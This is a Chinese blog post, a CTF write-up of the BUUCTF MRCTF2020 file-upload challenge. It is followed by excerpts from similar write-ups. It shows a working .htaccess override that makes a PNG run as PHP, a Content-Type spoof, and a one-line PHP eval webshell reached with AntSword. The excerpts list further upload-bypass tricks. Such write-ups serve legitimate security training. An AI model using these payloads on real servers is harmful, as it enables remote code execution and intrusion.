buuctf-[MRCTF2020]你传你呢(小宇特详解)

最新推荐文章于 2023-10-12 20:14:13 发布
最新推荐文章于 2023-10-12 20:14:13 发布
阅读量1.4k 收藏 4
点赞数 2
文章标签: php apache 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122696975
版权

buuctf-[MRCTF2020]你传你🐎呢(小宇特详解)

这里先试着修改后缀进行黑名单绕过,然而不行

这里的正确方法是进行.htaccess绕过

这里先上传一个.htaccess文件

<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>

注意:这里上传.htaccess文件的时候一定要抓包将content-type的值修改为image/png

然后上传一个1.png

<?php
@eval($_POST['shell']);
?>

然后这里访问一下

http://e71c858a-e07f-4754-bd15-8f98ab4df2c8.node4.buuoj.cn:81/upload/9071e63361d90a15f6bfe46a2344e565/1.png

让其变为php文档

然后用蚁剑连接

flag在更目录的最下面

小宇特详解
关注
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 1990
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
BUUCTF [MRCTF2020]你你呢
墨子辰的博客
02-04 673
考点:.htaccess文件上 先上一个正常图片,发现成功上而且能够访问。 直接一个1.sdga丢上去,看看返回包。 发现可以成功上。 可能有人到这里就懵了,为什么要上1.sdga,它是个神马文件类型???? 对,这里我上了一个不存在的文件类型,这样可以方便我们一下判断出是白名单还是黑名单限制。 这里既然能够上一个不存在的文件名,那么说明这里是黑名单限制,so接下来就是黑名单上的招式咯。 看好了 别眨眼·~~~ No.1:上 .htaccess No.2:上 .user.ini
BUUCTF闯关日记--[MRCTF2020]你你呢(超详解)
qq_64201116的博客
05-19 3865
进入页面 文件上漏洞,因为有些人没看过我前面的文章我再把我的总结发一下 1、前端绕过,抓包修改后缀名, 2、文件内容绕过,用图片马,抓包修改后缀绕过 3、黑名单绕过,那么我们可以改成phtml抓包绕过 4、.htaccess绕过,只要有这个配置文件,并且内容为“AddType application/x-httpd-php .jpg(就是把所以jpg后缀的文件全都当作php文件来执行)” 5、大小写绕过,抓包后修改后缀为.PHp 7、空格绕过,抓包修改后缀,在后缀后面加上空格 8、点绕
BUUCTF之[MRCTF2020]你你呢-------文件解析漏洞
weixin_44632787的博客
06-19 9220
BUUCTF之[MRCTF2020]你你????呢 虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。 首先,启动挑战的项目 emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上漏洞,结果没做出来。 不管怎么样,先上一句话木马。并且将下面的内容保存成文件1.png GIF89a? <script language="php">eval($_POST['zyh']);</s
BUUCTF WEB [MRCTF2020]你你*呢
Y1da的博客
04-18 326
BUUCTF WEB [MRCTF2020]你你🐎呢 解法有些类似[SUCTF 2019]CheckIn 尝试上各种php文件后缀均被过滤,尝试上.htaccess文件将png文件当做php文件执行 AddType application/x-httpd-php .png 上后抓包,将Content-Type修改为image/png POST /upload.php HTTP/1.1 Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu
[MRCTF2020]你你呢
weixin_51019270的博客
03-07 719
[MRCTF2020]你你????呢 WP 知识点 htaccess文件简介 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 通常,htaccess使用的语法和主配置文件一样 在这道题,htaccess文件的作用仅仅是让服务器去
buuctf-[BJDCTF2020]ZJCTF,不过如此
qq_42728977的博客
12-26 2365
[BJDCTF2020]ZJCTF,不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
legend-7drl:2020年7DRL
02-06
【legend-7drl:2020年7DRL】是一个基于PICO-8平台的游戏项目,参与了2020年的7 Day Roguelike Challenge(7DRL)。7DRL挑战是一场全球范围内的游戏开发比赛,参赛者需在7天内独立完成一款Roguelike类型的游戏。...
文章::bookmark:我的学习笔记和记忆-分享我的学习片段和与你的回忆
01-31
这篇文章的标题和描述暗示了它是一个个人的学习笔记集合,作者希望通过分享自己的学习经历和记忆,来帮助读者理解和学习各种IT技术。...总之,这是一份丰富的学习资源,无论你是前端新手还是资深开发者,都能从中受益。
2020-2021学年吉林省长春市农安县八年级上学期道德与法治期末素质教育质量监测试卷含详解.pdf
11-06
【知识点详解】 1. **生命价值的理解**:朱自清的这句话强调了每个人生命的独特性和价值,每个人都有自己的风格和特点,是独一无二的存在。生命的价值并非只在于从事艺术,而是体现在个人的生活经历和对世界的贡献...
EPS-2020-2-G3:由MDS和EPS组成的仓库03
03-06
冈山Projeto 绕过Wiki com Docker 准执行人所在地,诉讼程序: Instale o Docker嵌套; 不正确的Docker Compose嵌套; Na pasta raiz do projeto,将Wiki com初始化为documentaçã... Acesso Wiki无导航程序: 。...
[MRCTF2020]你你呢1
:-)
03-31 1595
[MRCTF2020]你你????呢1 STEP1:尝试改写文件头和和文件内容 显示: 判断可能与user.ini或.htaccess文件有关 STEP2:上.htaccess文件 显示: 上成功,上一个1.png文件 STEP3:上1.png文件包含一句木马 显示: STEP4:蚁剑连接 显示: 得到flag ...
BUUCTF之[MRCTF2020]你你呢1
最新发布
weixin_66294723的博客
10-12 1039
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
[MRCTF2020]你你呢 1
devilare的博客
05-22 5586
[MRCTF2020]你你????呢 文件上漏洞,打开题目 随便上个文件嘿呦,被过滤了,试试大小写等等,好像都绕不过。嗯。。。瓶颈,看看大佬wp,.htaccess文件, htaccess小知识 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOver
BUUCTF之[MRCTF2020]你你呢 1】
qq_40646572的博客
10-25 5452
首先,正常上图片文件,竟然因为文件大小的问题,上失败,就挺难受。不过还好,总算知道是什么原因不能上。总体来讲,这道题,难度是可以的,需要一步步的进行尝试。
BUUCTF Web [MRCTF2020]你你呢1 & [极客大挑战 2019]HardSQL1
网安小趴菜
09-07 770
BUUCTF Web [MRCTF2020]你你🐎呢1 & [极客大挑战 2019]HardSQL1
BUUCTF - [MRCTF2020]你你呢
qq_40860153的博客
10-12 445
1.打开题目,一个简单的文件上,需要利用 .htaccess 文件把.jpg文件解析成.php执行 2.上.php,发现不行,试试上.jpg,可以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值